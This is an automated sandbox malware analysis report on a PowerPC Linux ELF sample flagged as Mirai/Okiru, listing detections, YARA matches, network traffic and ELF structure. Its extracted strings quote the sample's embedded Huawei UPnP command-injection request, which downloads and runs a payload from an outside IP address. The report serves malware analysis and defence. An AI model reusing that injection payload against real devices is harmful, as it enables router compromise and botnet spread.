Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
pXwuZJXauT.elf

Overview

General Information

Sample name:pXwuZJXauT.elf
renamed because original name is a hash value
Original sample name:52338628afaf9abc17472eb3862b132e.elf
Analysis ID:1428720
MD5:52338628afaf9abc17472eb3862b132e
SHA1:f5c8653e606cf9562b6f44ec3d73f126aff6fa43
SHA256:1b90358ecf1177533ed3138949c76714b4404f0b1b8bf27a84978bd1e0248e2f
Tags:32elfgafgytpowerpc
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Exit code information suggests that the sample terminated abnormally, try to lookup the sample's target architecture.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1428720
Start date and time:2024-04-19 13:14:02 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:pXwuZJXauT.elf
renamed because original name is a hash value
Original Sample Name:52338628afaf9abc17472eb3862b132e.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@0/0
Command:/tmp/pXwuZJXauT.elf
PID:6219
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • pXwuZJXauT.elf (PID: 6219, Parent: 6134, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/pXwuZJXauT.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
pXwuZJXauT.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    pXwuZJXauT.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      pXwuZJXauT.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        pXwuZJXauT.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1d490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d4a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d4b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d4cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d4e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d4f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d508:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d51c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d530:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d544:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d558:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d56c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d580:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d594:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d5a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d5bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d5d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d5e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d5f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d60c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1d620:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        SourceRuleDescriptionAuthorStrings
        6219.1.00007f4798001000.00007f4798022000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
          6219.1.00007f4798001000.00007f4798022000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
            6219.1.00007f4798001000.00007f4798022000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6219.1.00007f4798001000.00007f4798022000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0x1d490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d4a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d4b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d4cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d4e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d4f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d508:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d51c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d530:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d544:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d558:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d56c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d580:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d594:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d5a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d5bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d5d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d5e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d5f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d60c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1d620:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              Process Memory Space: pXwuZJXauT.elf PID: 6219JoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 2 entries
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: pXwuZJXauT.elfAvira: detected
                Source: pXwuZJXauT.elfReversingLabs: Detection: 50%
                Source: pXwuZJXauT.elfVirustotal: Detection: 45%Perma Link
                Source: pXwuZJXauT.elfString: /proc/proc/%d/cmdlinewgetcurlbusybox/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: pXwuZJXauT.elfString found in binary or memory: http://103.174.73.190/tajma.mpsl;
                Source: pXwuZJXauT.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: pXwuZJXauT.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                System Summary

                barindex
                Source: pXwuZJXauT.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 6219.1.00007f4798001000.00007f4798022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: pXwuZJXauT.elf PID: 6219, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.174.73.190 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: /bin/busybox/
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.174.73.190 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exe/var/Challenge//app/hi3511/gmDVRibox/usr/dvr_main _8182T_1108/mnt/mtd/app/gui/var/Kylin/l0 c/udevd/anko-app/ankosample _8182T_1104/var/tmp/sonia/hicorestm_hi3511_dvr/bin/busybox//usr/lib/systemd/systemd//usr/libexec/openssh/sftp-server/usr/shellmnt/sys//bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davinci/telnetsshwatchdog/var/spool//var/Sofia/sshd/usr/compress/bin//compress/bin/compress/usr/bashtelnetddropbearropbearencodercundi/var/cundi//var/Condi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//usr/lib/systemd//system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server//opt/
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinewgetcurlbusybox/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: pXwuZJXauT.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 6219.1.00007f4798001000.00007f4798022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: pXwuZJXauT.elf PID: 6219, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: classification engineClassification label: mal88.troj.linELF@0/0@0/0
                Source: /tmp/pXwuZJXauT.elf (PID: 6219)Queries kernel information via 'uname': Jump to behavior
                Source: pXwuZJXauT.elf, 6219.1.0000559cfa885000.0000559cfa914000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
                Source: pXwuZJXauT.elf, 6219.1.0000559cfa885000.0000559cfa914000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
                Source: pXwuZJXauT.elf, 6219.1.00007ffe169c5000.00007ffe169e6000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
                Source: pXwuZJXauT.elf, 6219.1.00007ffe169c5000.00007ffe169e6000.rw-.sdmpBinary or memory string: "x86_64/usr/bin/qemu-ppc/tmp/pXwuZJXauT.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/pXwuZJXauT.elf
                Source: pXwuZJXauT.elf, 6219.1.00007ffe169c5000.00007ffe169e6000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: pXwuZJXauT.elf, type: SAMPLE
                Source: Yara matchFile source: 6219.1.00007f4798001000.00007f4798022000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pXwuZJXauT.elf PID: 6219, type: MEMORYSTR
                Source: Yara matchFile source: pXwuZJXauT.elf, type: SAMPLE
                Source: Yara matchFile source: 6219.1.00007f4798001000.00007f4798022000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pXwuZJXauT.elf PID: 6219, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: pXwuZJXauT.elf, type: SAMPLE
                Source: Yara matchFile source: 6219.1.00007f4798001000.00007f4798022000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pXwuZJXauT.elf PID: 6219, type: MEMORYSTR
                Source: Yara matchFile source: pXwuZJXauT.elf, type: SAMPLE
                Source: Yara matchFile source: 6219.1.00007f4798001000.00007f4798022000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pXwuZJXauT.elf PID: 6219, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path InterceptionDirect Volume AccessOS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                No configs have been found
                SourceDetectionScannerLabelLink
                pXwuZJXauT.elf50%ReversingLabsLinux.Trojan.Mirai
                pXwuZJXauT.elf45%VirustotalBrowse
                pXwuZJXauT.elf100%AviraEXP/ELF.Mirai.Z.A
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://103.174.73.190/tajma.mpsl;pXwuZJXauT.elffalse
                  unknown
                  http://schemas.xmlsoap.org/soap/encoding/pXwuZJXauT.elffalse
                    high
                    http://schemas.xmlsoap.org/soap/envelope/pXwuZJXauT.elffalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      109.202.202.202
                      unknownSwitzerland
                      13030INIT7CHfalse
                      91.189.91.43
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      91.189.91.42
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      109.202.202.202uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                        wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                          JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                            qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                              qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                  qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                    46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                      l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                        4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                          91.189.91.43uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                            wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                              JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                  qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                    qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                      46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                        l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                          4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                            XioVUcbE3G.elfGet hashmaliciousUnknownBrowse
                                                              91.189.91.42uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                    qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                      qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                        FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                                                4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CANONICAL-ASGBFtRTuVcia6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  3M2y5KkOrL.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  qIEANK2huJ.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  NlF293hgXW.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  CANONICAL-ASGBFtRTuVcia6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  uycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  3M2y5KkOrL.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  qIEANK2huJ.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  NlF293hgXW.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  INIT7CHuycqnGcDJD.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  wn8pgKNArU.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  qlgIEbAy2D.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  qbmHR5ZIJL.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  qlt52dfogC.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  46t2vW6nO9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  l1uxT537eS.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  No context
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                                                  Entropy (8bit):5.759488918054513
                                                                                  TrID:
                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                  File name:pXwuZJXauT.elf
                                                                                  File size:150'916 bytes
                                                                                  MD5:52338628afaf9abc17472eb3862b132e
                                                                                  SHA1:f5c8653e606cf9562b6f44ec3d73f126aff6fa43
                                                                                  SHA256:1b90358ecf1177533ed3138949c76714b4404f0b1b8bf27a84978bd1e0248e2f
                                                                                  SHA512:f59dfc3ffea7895bf03ff3e84fb98cc59a6e4a88f01645506439efbc2bba968180393d4fd38332bc66808033734bc7fd2bcc93fadbf94b8a766250950dc664a4
                                                                                  SSDEEP:1536:HNXUFGTCafj8rA0HgqeRrsgzIPwxqQEx3CNw5dBrKzJBrMZ6vjox/RRAdAWfC6mk:5AGTXfj8hgclxyNwjuBc69vPbV
                                                                                  TLSH:D7E33A06B31C0A47E1A72EB43A3F27E193AFDED121E4F644251FBA899271D321546ECD
                                                                                  File Content Preview:.ELF...........................4..K......4. ...(......................................................G.............dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........L8..../...@..`= ..;........+../...A..$8...}).....

                                                                                  ELF header

                                                                                  Class:ELF32
                                                                                  Data:2's complement, big endian
                                                                                  Version:1 (current)
                                                                                  Machine:PowerPC
                                                                                  Version Number:0x1
                                                                                  Type:EXEC (Executable file)
                                                                                  OS/ABI:UNIX - System V
                                                                                  ABI Version:0
                                                                                  Entry Point Address:0x100001f8
                                                                                  Flags:0x0
                                                                                  ELF Header Size:52
                                                                                  Program Header Offset:52
                                                                                  Program Header Size:32
                                                                                  Number of Program Headers:3
                                                                                  Section Header Offset:150436
                                                                                  Section Header Size:40
                                                                                  Number of Section Headers:12
                                                                                  Header String Table Index:11
                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                  NULL0x00x00x00x00x0000
                                                                                  .initPROGBITS0x100000940x940x240x00x6AX004
                                                                                  .textPROGBITS0x100000b80xb80x1cef80x00x6AX004
                                                                                  .finiPROGBITS0x1001cfb00x1cfb00x200x00x6AX004
                                                                                  .rodataPROGBITS0x1001cfd00x1cfd00x33bc0x00x2A008
                                                                                  .ctorsPROGBITS0x100303900x203940xc0x00x3WA004
                                                                                  .dtorsPROGBITS0x1003039c0x203a00x80x00x3WA004
                                                                                  .dataPROGBITS0x100303c00x203c40x46f60x00x3WA0032
                                                                                  .sdataPROGBITS0x10034ab80x24abc0x9c0x00x3WA004
                                                                                  .sbssNOBITS0x10034b540x24b580xe40x00x3WA004
                                                                                  .bssNOBITS0x10034c380x24b580x48180x00x3WA008
                                                                                  .shstrtabSTRTAB0x00x24b580x4b0x00x0001
